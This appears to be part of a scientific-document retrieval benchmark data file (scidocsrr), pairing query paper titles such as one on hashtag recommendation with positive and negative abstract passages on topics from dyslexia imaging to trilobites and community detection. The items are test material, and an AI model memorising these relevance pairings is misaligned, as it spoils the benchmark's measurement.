"text": "BACKGROUND\nConverging evidence indicates a functional disruption in the neural systems for reading in adults with dyslexia. We examined brain activation patterns in dyslexic and nonimpaired children during pseudoword and real-word reading tasks that required phonologic analysis (i.e., tapped the problems experienced by dyslexic children in sounding out words).\n\n\nMETHODS\nWe used functional magnetic resonance imaging (fMRI) to study 144 right-handed children, 70 dyslexic readers, and 74 nonimpaired readers as they read pseudowords and real words.\n\n\nRESULTS\nChildren with dyslexia demonstrated a disruption in neural systems for reading involving posterior brain regions, including parietotemporal sites and sites in the occipitotemporal area. Reading skill was positively correlated with the magnitude of activation in the left occipitotemporal region. Activation in the left and right inferior frontal gyri was greater in older compared with younger dyslexic children.\n\n\nCONCLUSIONS\nThese findings provide neurobiological evidence of an underlying disruption in the neural systems for reading in children with dyslexia and indicate that it is evident at a young age. The locus of the disruption places childhood dyslexia within the same neurobiological framework as dyslexia, and acquired alexia, occurring in adults.",
"title": ""
}
] | scidocsrr |
00942a423d13cb0a425459dd34a4ab74 | Hashtag Recommendation Using Dirichlet Process Mixture Models Incorporating Types of Hashtags | [
{
"docid": "d9615510bb6cf2cb2d8089be402c193c",
"text": "Tagging plays an important role in many recent websites. Recommender systems can help to suggest a user the tags he might want to use for tagging a specific item. Factorization models based on the Tucker Decomposition (TD) model have been shown to provide high quality tag recommendations outperforming other approaches like PageRank, FolkRank, collaborative filtering, etc. The problem with TD models is the cubic core tensor resulting in a cubic runtime in the factorization dimension for prediction and learning.\n In this paper, we present the factorization model PITF (Pairwise Interaction Tensor Factorization) which is a special case of the TD model with linear runtime both for learning and prediction. PITF explicitly models the pairwise interactions between users, items and tags. The model is learned with an adaption of the Bayesian personalized ranking (BPR) criterion which originally has been introduced for item recommendation. Empirically, we show on real world datasets that this model outperforms TD largely in runtime and even can achieve better prediction quality. Besides our lab experiments, PITF has also won the ECML/PKDD Discovery Challenge 2009 for graph-based tag recommendation.",
"title": ""
}
] | [
{
"docid": "030c8aeb4e365bfd2fdab710f8c9f598",
"text": "By combining linear graph theory with the principle of virtual work, a dynamic formulation is obtained that extends graph-theoretic modelling methods to the analysis of exible multibody systems. The system is represented by a linear graph, in which nodes represent reference frames on rigid and exible bodies, and edges represent components that connect these frames. By selecting a spanning tree for the graph, the analyst can choose the set of coordinates appearing in the nal system of equations. This set can include absolute, joint, or elastic coordinates, or some combination thereof. If desired, all non-working constraint forces and torques can be automatically eliminated from the dynamic equations by exploiting the properties of virtual work. The formulation has been implemented in a computer program, DynaFlex, that generates the equations of motion in symbolic form. Three examples are presented to demonstrate the application of the formulation, and to validate the symbolic computer implementation.",
"title": ""
},
{
"docid": "7abdd1fc5f2a8c5b7b19a6a30eadad0a",
"text": "This Paper investigate action recognition by using Extreme Gradient Boosting (XGBoost). XGBoost is a supervised classification technique using an ensemble of decision trees. In this study, we also compare the performance of Xboost using another machine learning techniques Support Vector Machine (SVM) and Naive Bayes (NB). The experimental study on the human action dataset shows that XGBoost better as compared to SVM and NB in classification accuracy. Although takes more computational time the XGBoost performs good classification on action recognition.",
"title": ""
},
{
"docid": "072bec0456cb46292b0e6f4e065c3163",
"text": "Vector representations and vector space modeling (VSM) play a central role in modern machine learning. We propose a novel approach to ‘vector similarity searching’ over dense semantic representations of words and documents that can be deployed on top of traditional inverted-index-based fulltext engines, taking advantage of their robustness, stability, scalability and ubiquity. We show that this approach allows the indexing and querying of dense vectors in text domains. This opens up exciting avenues for major efficiency gains, along with simpler deployment, scaling and monitoring. The end result is a fast and scalable vector database with a tunable tradeoff between vector search performance and quality, backed by a standard fulltext engine such as Elasticsearch. We empirically demonstrate its querying performance and quality by applying this solution to the task of semantic searching over a dense vector representation of the entire English Wikipedia.",
"title": ""
},
{
"docid": "056f5179fa5c0cdea06d29d22a756086",
"text": "Finding solution values for unknowns in Boolean equations was a principal reasoning mode in the Algebra of Logic of the 19th century. Schröder investigated it as Auflösungsproblem (solution problem). It is closely related to the modern notion of Boolean unification. Today it is commonly presented in an algebraic setting, but seems potentially useful also in knowledge representation based on predicate logic. We show that it can be modeled on the basis of first-order logic extended by secondorder quantification. A wealth of classical results transfers, foundations for algorithms unfold, and connections with second-order quantifier elimination and Craig interpolation show up. Although for first-order inputs the set of solutions is recursively enumerable, the development of constructive methods remains a challenge. We identify some cases that allow constructions, most of them based on Craig interpolation, and show a method to take vocabulary restrictions on solution components into account. Revision: June 26, 2017",
"title": ""
},
{
"docid": "67c3e39341c5522b309016b2bbb6a64a",
"text": "Process discovery, i.e., learning process models from event logs, has attracted the attention of researchers and practitioners. Today, there exists a wide variety of process mining techniques that are able to discover the control-flow of a process based on event data. These techniques are able to identify decision points, but do not analyze data flow to find rules explaining why individual cases take a particular path. Fortunately, recent advances in conformance checking can be used to align an event log with data and a process model with decision points. These alignments can be used to generate a well-defined classification problem per decision point. This way data flow and guards can be discovered and added to the process model.",
"title": ""
},
{
"docid": "d9a71b75cae2a72dd187b085018b285f",
"text": "The most important part of the active power filters is generating of gate signal for inverters. This paper presents Single Phase Application of Space Vector Pulse Width Modulation for shunt active power filters. In conventional SVPWM, all of the phase's currents are controlled together, but in this method each of phase currents is controlled independently from the measured currents of other phases. In another word, this method prevents from influence of other phase's errors in the control of considered phase. In this method, the implementation of control logic will be simpler than the conventional SVPWM. For showing the performance of proposed method a typical system has been simulated by MATLAB/SIMULINK. At last, the results of proposed method are compared with the conventional SVPWM. The results show that proposed method have better performance in generating of the compensation current in active power filter.",
"title": ""
},
{
"docid": "8ca0edf4c51b0156c279fcbcb1941d2b",
"text": "The good fossil record of trilobite exoskeletal anatomy and ontogeny, coupled with information on their nonbiomineralized tissues, permits analysis of how the trilobite body was organized and developed, and the various evolutionary modifications of such patterning within the group. In several respects trilobite development and form appears comparable with that which may have characterized the ancestor of most or all euarthropods, giving studies of trilobite body organization special relevance in the light of recent advances in the understanding of arthropod evolution and development. The Cambrian diversification of trilobites displayed modifications in the patterning of the trunk region comparable with those seen among the closest relatives of Trilobita. In contrast, the Ordovician diversification of trilobites, although contributing greatly to the overall diversity within the clade, did so within a narrower range of trunk conditions. Trilobite evolution is consistent with an increased premium on effective enrollment and protective strategies, and with an evolutionary trade-off between the flexibility to vary the number of trunk segments and the ability to regionalize portions of the trunk. 401 A nn u. R ev . E ar th P la ne t. Sc i. 20 07 .3 5: 40 143 4. D ow nl oa de d fr om a rj ou rn al s. an nu al re vi ew s. or g by U N IV E R SI T Y O F C A L IF O R N IA R IV E R SI D E L IB R A R Y o n 05 /0 2/ 07 . F or p er so na l u se o nl y. ANRV309-EA35-14 ARI 20 March 2007 15:54 Cephalon: the anteriormost or head division of the trilobite body composed of a set of conjoined segments whose identity is expressed axially Thorax: the central portion of the trilobite body containing freely articulating trunk segments Pygidium: the posterior tergite of the trilobite exoskeleton containing conjoined segments INTRODUCTION The rich record of the diversity and development of the trilobite exoskeleton (along with information on the geological occurrence, nonbiomineralized tissues, and associated trace fossils of trilobites) provides the best history of any Paleozoic arthropod group. The retention of features that may have characterized the most recent common ancestor of all living arthropods, which have been lost or obscured in most living forms, provides insights into the nature of the evolutionary radiation of the most diverse metazoan phylum alive today. Studies of phylogenetic stem-group taxa, of which Trilobita provide a prominent example, have special significance in the light of renewed interest in arthropod evolution prompted by comparative developmental genetics. Although we cannot hope to dissect the molecular controls operative within trilobites, the evolutionary developmental biology (evo-devo) approach permits a fresh perspective from which to examine the contributions that paleontology can make to evolutionary biology, which, in the context of the overall evolutionary history of Trilobita, is the subject of this review. TRILOBITES: BODY PLAN AND ONTOGENY Trilobites were a group of marine arthropods that appeared in the fossil record during the early Cambrian approximately 520 Ma and have not been reported from rocks younger than the close of the Permian, approximately 250 Ma. Roughly 15,000 species have been described to date, and although analysis of the occurrence of trilobite genera suggests that the known record is quite complete (Foote & Sepkoski 1999), many new species and genera continue to be established each year. 
The known diversity of trilobites results from their strongly biomineralized exoskeletons, made of two layers of low magnesium calcite, which was markedly more durable than the sclerites of most other arthropods. Because the exoskeleton was rich in morphological characters and was the only body structure preserved in the vast majority of specimens, skeletal form has figured prominently in the biological interpretation of trilobites.",
"title": ""
},
{
"docid": "faf4eeaaf3e8516ac65543c0bc5e50d6",
"text": "Service Oriented Architecture facilitates more feature as compared to legacy architecture which makes this architecture widely accepted by the industry. Service oriented architecture provides feature like reusability, composability, distributed deployment. Service of SOA is governed by SOA governance board in which they provide approval to create the services and also provide space to expose the particular services. Sometime many services are kept in a repository which creates service identification issue. Service identification is one of the most critical aspects in service oriented architecture. The services must be defined or identified keeping reuse and usage in different business contexts in mind. Rigorous review of Identified service should be done prior to development of the services. Identification of the authenticated service is challenging to development teams due to several reasons such as lack of business process documentation, lack of expert analyst, and lack of business executive involvement, lack of reuse of services, lack of right decision to choose the appropriate service. In some of the cases we have replica of same service exist, which creates difficulties in service identification. Existing design approaches of SOA doesn't take full advantage whereas proposed model is compatible more advantageous and increase the performance of the services. This paper proposes a model which will help in clustering the service repository based on service functionality. Service identification will be easy if we follow distributed repository based on functionality for our services. Generally in case of web services where service response time should be minimal, searching in whole repository delays response time. The proposed model will reduce the response time of the services and will also helpful in identifying the correct services within the specified time.",
"title": ""
},
{
"docid": "25921de89de837e2bcd2a815ec181564",
"text": "Satellite-based Global Positioning Systems (GPS) have enabled a variety of location-based services such as navigation systems, and become increasingly popular and important in our everyday life. However, GPS does not work well in indoor environments where walls, floors and other construction objects greatly attenuate satellite signals. In this paper, we propose an Indoor Positioning System (IPS) based on widely deployed indoor WiFi systems. Our system uses not only the Received Signal Strength (RSS) values measured at the current location but also the previous location information to determine the current location of a mobile user. We have conducted a large number of experiments in the Schorr Center of the University of Nebraska-Lincoln, and our experiment results show that our proposed system outperforms all other WiFi-based RSS IPSs in the comparison, and is 5% more accurate on average than others. iii ACKNOWLEDGMENTS Firstly, I would like to express my heartfelt gratitude to my advisor and committee chair, Professor Lisong Xu and the co-advisor Professor Zhigang Shen for their constant encouragement and guidance throughout the course of my master's study and all the stages of the writing of this thesis. Without their consistent and illuminating instruction, this thesis work could not have reached its present form. Their technical and editorial advice and infinite patience were essential for the completion of this thesis. I feel privileged to have had the opportunity to study under them. I thank Professor Ziguo Zhong and Professor Mehmet Vuran for serving on my Master's Thesis defense committee, and their involvement has greatly improved and clarified this work. I specially thank Prof Ziguo Zhong again, since his support has always been very generous in both time and research resources. I thank all the CSE staff and friends, for their friendship and for all the memorable times in UNL. I would like to thank everyone who has helped me along the way. At last, I give my deepest thanks go to my parents for their self-giving love and support throughout my life.",
"title": ""
},
{
"docid": "61d0454725e14defb8a4f142f5b893c7",
"text": "Automated keyphrase extraction is a fundamental textual information processing task concerned with the selection of representative phrases from a document that summarize its content. This work presents a novel unsupervised method for keyphrase extraction, whose main innovation is the use of local word embeddings (in particular GloVe vectors), i.e., embeddings trained from the single document under consideration. We argue that such local representation of words and keyphrases are able to accurately capture their semantics in the context of the document they are part of, and therefore can help in improving keyphrase extraction quality. Empirical results offer evidence that indeed local representations lead to better keyphrase extraction results compared to both embeddings trained on very large third corpora or larger corpora consisting of several documents of the same scientific field and to other state-of-the-art unsupervised keyphrase extraction methods.",
"title": ""
},
{
"docid": "ad8a727d0e3bd11cd972373451b90fe7",
"text": "The loss functions of deep neural networks are complex and their geometric properties are not well understood. We show that the optima of these complex loss functions are in fact connected by simple curves over which training and test accuracy are nearly constant. We introduce a training procedure to discover these high-accuracy pathways between modes. Inspired by this new geometric insight, we also propose a new ensembling method entitled Fast Geometric Ensembling (FGE). Using FGE we can train high-performing ensembles in the time required to train a single model. We achieve improved performance compared to the recent state-of-the-art Snapshot Ensembles, on CIFAR-10, CIFAR-100, and ImageNet.",
"title": ""
},
{
"docid": "9a427dae8e47e6004a45a19a2283326f",
"text": "This article describes the challenges that women and women of color face in their quest to achieve and perform in leadership roles in work settings. We discuss the barriers that women encounter and specifically address the dimensions of gender and race and their impact on leadership. We identify the factors associated with gender evaluations of leaders and the stereotypes and other challenges faced by White women and women of color. We use ideas concerning identity and the intersection of multiple identities to understand the way in which gender mediates and shapes the experience of women in the workplace. We conclude with suggestions for research and theory development that may more fully capture the complex experience of women who serve as leaders.",
"title": ""
},
{
"docid": "88c713e4358ab9fc9a6345aeed2105a9",
"text": "The train scheduling problem is an integer programming problem known to be NP hard. In practice such a problem is often required to be solved in real time, hence a quick heuristic that allows a good feasible solution to be obtained in a predetermined and finite number of steps is most desired. We propose an algorithm which is based on local optimality criteria in the event of a potential crossing conflict. The suboptimal but feasible solution can be obtained very quickly in polynomial time. The model can also be generalized to cater for the possibility of overtaking when the trains have different speed. We also furnish a complexity analysis to show the NP-completeness of the problem. Simulation results for two non-trivial examples are presented to demonstrate the effectiveness of the proposed algorithm.",
"title": ""
},
{
"docid": "a59c73927c732521cfb58385b58fab32",
"text": "BACKGROUND\nFrequent use of Facebook and other social networks is thought to be associated with certain behavioral changes, and some authors have expressed concerns about its possible detrimental effect on mental health. In this work, we investigated the relationship between social networking and depression indicators in adolescent population.\n\n\nSUBJECTS AND METHODS\nTotal of 160 high school students were interviewed using an anonymous, structured questionnaire and Back Depression Inventory - second edition (BDI-II-II). Apart from BDI-II-II, students were asked to provide the data for height and weight, gender, average daily time spent on social networking sites, average time spent watching TV, and sleep duration in a 24-hour period.\n\n\nRESULTS\nAverage BDI-II-II score was 8.19 (SD=5.86). Average daily time spent on social networking was 1.86 h (SD=2.08 h), and average time spent watching TV was 2.44 h (SD=1.74 h). Average body mass index of participants was 21.84 (SD=3.55) and average sleep duration was 7.37 (SD=1.82). BDI-II-II score indicated minimal depression in 104 students, mild depression in 46 students, and moderate depression in 10 students. Statistically significant positive correlation (p<0.05, R=0.15) was found between BDI-II-II score and the time spent on social networking.\n\n\nCONCLUSIONS\nOur results indicate that online social networking is related to depression. Additional research is required to determine the possible causal nature of this relationship.",
"title": ""
},
{
"docid": "7c8776729f9e734133d5d09483080435",
"text": "We consider the problem of mitigating a highly varying wireless channel between a transmitting ground node and receivers on a small, low-altitude unmanned aerial vehicle (UAV) in a 802.11 wireless mesh network. One approach is to use multiple transmitter and receiver nodes that exploit the channel's spatial/temporal diversity and that cooperate to improve overall packet reception. We present a series of measurement results from a real-world testbed that characterize the resulting wireless channel. We show that the correlation between receiver nodes on the airplane is poor at small time scales so receiver diversity can be exploited. Our measurements suggest that using several receiver nodes simultaneously can boost packet delivery rates substantially. Lastly, we show that similar results apply to transmitter selection diversity as well.",
"title": ""
},
{
"docid": "b4533cd83713a94f00239857c0ff29a5",
"text": "Nowadays, IT community is experiencing great shift in computing and information storage infrastructures by using powerful, flexible and reliable alternative of cloud computing. The power of cloud computing may also be realized for mankind if some dedicated disaster management clouds will be developed at various countries cooperating each other on some common standards. The experimentation and deployment of cloud computing by governments of various countries for mankind may be the justified use of IT at social level. It is possible to realize a real-time disaster management cloud where applications in cloud will respond within a specified time frame. If a Real-Time Cloud (RTC) is available then for intelligent machines like robots the complex processing may be done on RTC via request and response model. The complex processing is more desirable as level of intelligence increases in robots towards humans even more. Therefore, it may be possible to manage disaster sites more efficiently with more intelligent cloud robots without great lose of human lives waiting for various assistance at disaster site. Real-time garbage collector, real-time specification for Java, multicore CPU architecture with network-on-chip, parallel algorithms, distributed algorithms, high performance database systems, high performance web servers and gigabit networking can be used to develop real-time applications in cloud.",
"title": ""
},
{
"docid": "6c584b512e51b3dd4f16a9c753ac2fc5",
"text": "Cloud computing and virtualization technologies play important roles in modern service-oriented computing paradigm. More conventional services are being migrated to virtualized computing environments to achieve flexible deployment and high availability. We introduce a schedule algorithm based on fuzzy inference system (FIS), for global container resource allocation by evaluating nodes' statuses using FIS. We present the approaches to build containerized test environment and validates the effectiveness of the resource allocation policies by running sample use cases. Experiment results show that the presented infrastructure and schema derive optimal resource configurations and significantly improves the performance of the cluster.",
"title": ""
},
{
"docid": "3bc9e52cd4bbce80d45c7f89b20284b0",
"text": "Many tasks in computational linguistics traditionally rely on hand-crafted or curated resources like thesauri or word-sense-annotated corpora. The availability of big data, from the Web and other sources, has changed this situation. Harnessing these assets requires scalable methods for data and text analytics. This paper gives an overview on our recent work that utilizes big data methods for enhancing semantics-centric tasks dealing with natural language texts. We demonstrate a virtuous cycle in harvesting knowledge from large data and text collections and leveraging this knowledge in order to improve the annotation and interpretation of language in Web pages and social media. Specifically, we show how to build large dictionaries of names and paraphrases for entities and relations, and how these help to disambiguate entity mentions in texts.",
"title": ""
},
{
"docid": "1c9644fa4e259da618d5371512f1e73d",
"text": "Suicidal behavior is a leading cause of injury and death worldwide. Information about the epidemiology of such behavior is important for policy-making and prevention. The authors reviewed government data on suicide and suicidal behavior and conducted a systematic review of studies on the epidemiology of suicide published from 1997 to 2007. The authors' aims were to examine the prevalence of, trends in, and risk and protective factors for suicidal behavior in the United States and cross-nationally. The data revealed significant cross-national variability in the prevalence of suicidal behavior but consistency in age of onset, transition probabilities, and key risk factors. Suicide is more prevalent among men, whereas nonfatal suicidal behaviors are more prevalent among women and persons who are young, are unmarried, or have a psychiatric disorder. Despite an increase in the treatment of suicidal persons over the past decade, incidence rates of suicidal behavior have remained largely unchanged. Most epidemiologic research on suicidal behavior has focused on patterns and correlates of prevalence. The next generation of studies must examine synergistic effects among modifiable risk and protective factors. New studies must incorporate recent advances in survey methods and clinical assessment. Results should be used in ongoing efforts to decrease the significant loss of life caused by suicidal behavior.",
"title": ""
},
{
"docid": "21002b649f123b61b99f9167952b5888",
"text": "Transposable elements and retroviruses are found in most genomes, can be pathogenic and are widely used as gene-delivery and functional genomics tools. Exploring whether these genetic elements target specific genomic sites for integration and how this preference is achieved is crucial to our understanding of genome evolution, somatic genome plasticity in cancer and ageing, host–parasite interactions and genome engineering applications. High-throughput profiling of integration sites by next-generation sequencing, combined with large-scale genomic data mining and cellular or biochemical approaches, has revealed that the insertions are usually non-random. The DNA sequence, chromatin and nuclear context, and cellular proteins cooperate in guiding integration in eukaryotic genomes, leading to a remarkable diversity of insertion site distribution and evolutionary strategies.",
"title": ""
}
] | scidocsrr |
a86d82afa0c2f7e355d4403bf08eb7df | Semantic Interaction for Visual Analytics: Inferring Analytical Reasoning for Model Steering | [
{
"docid": "82c225478a98679348c3c20810a8d13d",
"text": "Visual analytic tools aim to support the cognitively demanding task of sensemaking. Their success often depends on the ability to leverage capabilities of mathematical models, visualization, and human intuition through flexible, usable, and expressive interactions. Spatially clustering data is one effective metaphor for users to explore similarity and relationships between information, adjusting the weighting of dimensions or characteristics of the dataset to observe the change in the spatial layout. Semantic interaction is an approach to user interaction in such spatializations that couples these parametric modifications of the clustering model with users' analytic operations on the data (e.g., direct document movement in the spatialization, highlighting text, search, etc.). In this paper, we present results of a user study exploring the ability of semantic interaction in a visual analytic prototype, ForceSPIRE, to support sensemaking. We found that semantic interaction captures the analytical reasoning of the user through keyword weighting, and aids the user in co-creating a spatialization based on the user's reasoning and intuition.",
"title": ""
}
] | [
{
"docid": "f322c2d3ab7db46feeceec2a6336cf6b",
"text": "Robust and accurate visual tracking is one of the most challenging computer vision problems. Due to the inherent lack of training data, a robust approach for constructing a target appearance model is crucial. The existing spatially regularized discriminative correlation filter (SRDCF) method learns partial-target information or background information when experiencing rotation, out of view, and heavy occlusion. In order to reduce the computational complexity by creating a novel method to enhance tracking ability, we first introduce an adaptive dimensionality reduction technique to extract the features from the image, based on pre-trained VGG-Net. We then propose an adaptive model update to assign weights during an update procedure depending on the peak-to-sidelobe ratio. Finally, we combine the online SRDCF-based tracker with the offline Siamese tracker to accomplish long term tracking. Experimental results demonstrate that the proposed tracker has satisfactory performance in a wide range of challenging tracking scenarios.",
"title": ""
},
{
"docid": "e210c3e4a5dbd49192aca2161b44c3c6",
"text": "The purpose of this paper is to develop a novel hybrid optimization method (HRABC) based on artificial bee colony algorithm and Taguchi method. The proposed approach is applied to a structural design optimization of a vehicle component and a multi-tool milling optimization problem. A comparison of state-of-the-art optimization techniques for the design and manufacturing optimization problems is presented. The results have demonstrated the superiority of the HRABC over the other",
"title": ""
},
{
"docid": "2efd26fc1e584aa5f70bdf9d24e5c2cd",
"text": "Bridging cultures that have often been distant, Julia combines expertise from the diverse fields of computer science and computational science to create a new approach to numerical computing. Julia is designed to be easy and fast and questions notions generally held to be “laws of nature” by practitioners of numerical computing: 1. High-level dynamic programs have to be slow. 2. One must prototype in one language and then rewrite in another language for speed or deployment. 3. There are parts of a system appropriate for the programmer, and other parts that are best left untouched as they have been built by the experts. We introduce the Julia programming language and its design—a dance between specialization and abstraction. Specialization allows for custom treatment. Multiple dispatch, a technique from computer science, picks the right algorithm for the right circumstance. Abstraction, which is what good computation is really about, recognizes what remains the same after differences are stripped away. Abstractions in mathematics are captured as code through another technique from computer science, generic programming. Julia shows that one can achieve machine performance without sacrificing human convenience.",
"title": ""
},
{
"docid": "59ba83e88085445e3bcf009037af6617",
"text": "— We examine the relationship between resource abundance and several indicators of human welfare. Consistent with the existing literature on the relationship between resource abundance and economic growth we find that, given an initial income level, resource-intensive countries tend to suffer lower levels of human development. While we find only weak support for a direct link between resources and welfare, there is an indirect link that operates through institutional quality. There are also significant differences in the effects that resources have on different measures of institutional quality. These results imply that the ‘‘resource curse’’ is a more encompassing phenomenon than previously considered, and that key differences exist between the effects of different resource types on various aspects of governance and human welfare. 2005 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "a72c9eb8382d3c94aae77fa4eadd1df8",
"text": "Techniques for identifying the author of an unattributed document can be applied to problems in information analysis and in academic scholarship. A range of methods have been proposed in the research literature, using a variety of features and machine learning approaches, but the methods have been tested on very different data and the results cannot be compared. It is not even clear whether the differences in performance are due to feature selection or other variables. In this paper we examine the use of a large publicly available collection of newswire articles as a benchmark for comparing authorship attribution methods. To demonstrate the value of having a benchmark, we experimentally compare several recent feature-based techniques for authorship attribution, and test how well these methods perform as the volume of data is increased. We show that the benchmark is able to clearly distinguish between different approaches, and that the scalability of the best methods based on using function words features is acceptable, with only moderate decline as the difficulty of the problem is increased.",
"title": ""
},
{
"docid": "60fe7f27cd6312c986b679abce3fdea7",
"text": "In matters of great importance that have financial, medical, social, or other implications, we often seek a second opinion before making a decision, sometimes a third, and sometimes many more. In doing so, we weigh the individual opinions, and combine them through some thought process to reach a final decision that is presumably the most informed one. The process of consulting \"several experts\" before making a final decision is perhaps second nature to us; yet, the extensive benefits of such a process in automated decision making applications have only recently been discovered by computational intelligence community. Also known under various other names, such as multiple classifier systems, committee of classifiers, or mixture of experts, ensemble based systems have shown to produce favorable results compared to those of single-expert systems for a broad range of applications and under a variety of scenarios. Design, implementation and application of such systems are the main topics of this article. Specifically, this paper reviews conditions under which ensemble based systems may be more beneficial than their single classifier counterparts, algorithms for generating individual components of the ensemble systems, and various procedures through which the individual classifiers can be combined. We discuss popular ensemble based algorithms, such as bagging, boosting, AdaBoost, stacked generalization, and hierarchical mixture of experts; as well as commonly used combination rules, including algebraic combination of outputs, voting based techniques, behavior knowledge space, and decision templates. Finally, we look at current and future research directions for novel applications of ensemble systems. Such applications include incremental learning, data fusion, feature selection, learning with missing features, confidence estimation, and error correcting output codes; all areas in which ensemble systems have shown great promise",
"title": ""
},
{
"docid": "a7284bfc38d5925cb62f04c8f6dcaae2",
"text": "The brain's electrical signals enable people without muscle control to physically interact with the world.",
"title": ""
},
{
"docid": "8e6d1461b53b9f589532e27f0fa59a71",
"text": "Community structure describes the organization of a network into subgraphs that contain a prevalence of edges within each subgraph and relatively few edges across boundaries between subgraphs. The development of community-detection methods has occurred across disciplines, with numerous and varied algorithms proposed to find communities. As we present in this Chapter via several case studies, community detection is not just an “end game” unto itself, but rather a step in the analysis of network data which is then useful for furthering research in the disciplinary domain of interest. These case-study examples arise from diverse applications, ranging from social and political science to neuroscience and genetics, and we have chosen them to demonstrate key aspects of community detection and to highlight that community detection, in practice, should be directed by the application at hand. Most networks representing real-world systems display community structure, and many visualizations of networks lend themselves naturally to observations about groups of nodes that appear to be more connected to each other than to the rest of the network. One might be reasonably curious about why this is such a common feature across a great variety of real networks, and even more intriguingly, what do the groups mean? Considering examples from different disciplines, one can observe that these groups (or communities) often have important roles in the organization of a network. For example, in a social network where nodes represent individuals and edges describe friendships between them, communities can correspond to groups of people with shared interests (Granovetter, 1973; McPherson et al., 2001; Moody and White, 2003; Zachary, 1977). In the graph of the World Wide Web, where a directed edge between web pages represents a hyperlink from one to the other, communities often correspond to webpages with related topics (Flake et al., 2000). In brain networks of interconnected neurons or cortical areas, communities can correspond to specialized functional components such as visual and auditory systems (Sporns and Betzel, 2016). In networks representing interactions among proteins, communities can group together proteins that contribute to the same cellular function (Spirin and Mirny, 2003). Across each of these examples, the communities provide a new level of description of the network, and this intermediate (that is, “mesoscopic”) perspective between the microscopic (nodes) and macroscopic (the whole network) domains proves to be very useful in understanding the essential functionality and organizational principles of a network. In particular, one of the motivations to identify communities in many of the aforementioned applications is that the network structure aligns with data attributes such as age, location, interests, 1 ar X iv :1 70 5. 02 30 5v 1 [ ph ys ic s. so cph ] 5 M ay 2 01 7 health, race, sex and so on. However, congruent with most community-detection algorithms, we refer to structural communities in which there is a prevalence of edges between nodes in the same community versus those between communities. Importantly, this notion is a topological property of the network and is agnostic to attributes. 
In principle, one can choose other definitions for what constitutes a community, and we note that for attributed (also called annotated) networks there is growing interest in developing community-detection algorithms that utilize both structural and attribute information (Binkiewicz et al., 2014; Bothorel et al., 2015; Newman and Clauset, 2016; Peel et al., 2017; Yang et al., 2013). While here we do not explore these possibilities, and focus our attention on communities in the topological sense, it is important to note that there is often positive correlation between community structure and attribute information due to homophily (Aral et al., 2009; McPherson et al., 2001)—that is, edges exist preferentially between nodes with similar attributes. Generally speaking, studying the interplay between attribute information and network structure is complicated due to confounding effects (Shalizi and Thomas, 2011). Detecting communities in an automated manner is not a simple pursuit, first, because although the qualitative notions of communities may be intuitive, translating such ideas into an appropriate modeling framework can be challenging. In particular, various applications call for different notions of a community, each producing a different mesoscopic description of a network. Second, the computational complexity of community detection can be a fundamental issue; for example, the number of possible partitions of nodes into non-overlapping groups is non-polynomial in the size of the network (and allowing overlapping communities increases the number of possibilities), motivating important work on different heuristics for efficiently identifying communities. Such challenges make community detection one of the most complex—yet fascinating—areas of network science, with a huge and ever increasing number of different algorithms available in the literature. We only indicate a few classes of community-detection methods here, referring the reader to comprehensive community-detection reviews by Porter, Onnela, and Mucha (2009); Fortunato (2010); and Fortunato and Hric (2016) (see also a recent review by Schaub et al., 2017, on the conceptual differences between different perspectives on community detection). While the ideas of community detection have been around in sociology for decades (see, e.g., Coleman, 1964; Freeman, 2004; Moody and White, 2003), the field has benefited from significant contributions across numerous disciplines, proposing a variety of methods and algorithms for automating community detection. Graph partitioning (e.g., Barnes, 1982; Fiedler, 1973; Kernighan and Lin, 1970; Mahoney et al., 2012) spans a large literature across computer science and mathematics, aiming to divide a network into a specified number of groups so that some selected quantity is optimized, such as the number of edges between the groups (i.e., cut size). Modularity maximization (Newman and Girvan, 2004), a different optimization approach for graph partitioning originating in the physics literature, aims to find the partition with the largest difference between the total weight of within-community edges and that expected under a null model—that is, a random-network model with selected properties. Modularity maximization typically leads to more balanced community sizes, can account for degree heterogeneity in the network, and does not require a priori specification of the number of communities. 
However, it is well-known to suffer from a resolution limit (Fortunato and Barthélemy, 2007), and it is not at all clear how to best interpret the different numbers of communities that can be obtained by varying resolution parameters (Arenas et al., 2008b; Reichardt and Bornholdt, 2006). Statistical inference (e.g., Ball et al., 2011; Hastings, 2006; Karrer and Newman, 2011; Peixoto, 2013, 2014), arising from the statistics literature, typically aims to identify a parametrized generative model that describes the network (e.g., with maximum likelihood). For example, stochastic block models posit that the probability of an edge between two nodes depends only on the communities to which those nodes belong.",
"title": ""
},
{
"docid": "8f3497ecbe4c4687a1bc669c8933b556",
"text": "Many problems in multi-view geometry, when posed as minimization of the maximum reprojection error across observations, can be solved optimally in polynomial time. We show that these problems are instances of a convex-concave generalized fractional program. We survey the major solution methods for solving problems of this form and present them in a unified framework centered around a single parametric optimization problem. We propose two new algorithms and show that the algorithm proposed by Olsson et al. [21] is a special case of a classical algorithm for generalized fractional programming. The performance of all the algorithms is compared on a variety of datasets, and the algorithm proposed by Gugat [12] stands out as a clear winner. An open source MATLAB toolbox that implements all the algorithms presented here is made available.",
"title": ""
},
{
"docid": "ff5d8069062073285e1770bfae096d7e",
"text": "As Face Recognition(FR) technology becomes more mature and commercially available in the market, many different anti-spoofing techniques have been recently developed to enhance the security, reliability, and effectiveness of FR systems. As a part of anti-spoofing techniques, face liveness detection plays an important role to make FR systems be more secured from various attacks. In this paper, we propose a novel method for face liveness detection by using focus, which is one of camera functions. In order to identify fake faces (e.g. 2D pictures), our approach utilizes the variation of pixel values by focusing between two images sequentially taken in different focuses. The experimental result shows that our focus-based approach is a new method that can significantly increase the level of difficulty of spoof attacks, which is a way to improve the security of FR systems. The performance is evaluated and the proposed method achieves 100% fake detection in a given DoF(Depth of Field).",
"title": ""
},
{
"docid": "3c732abd9fc153a64a53dba098e9bbea",
"text": "Automatic image description systems are commonly trained and evaluated on large image description datasets. Recently, researchers have started to collect such datasets for languages other than English. An unexplored question is how different these datasets are from English and, if there are any differences, what causes them to differ. This paper provides a crosslinguistic comparison of Dutch, English, and German image descriptions. We find that these descriptions are similar in many respects, but the familiarity of crowd workers with the subjects of the images has a noticeable influence on description specificity.",
"title": ""
},
{
"docid": "c582e3c1f3896e5f86b0d322184582fd",
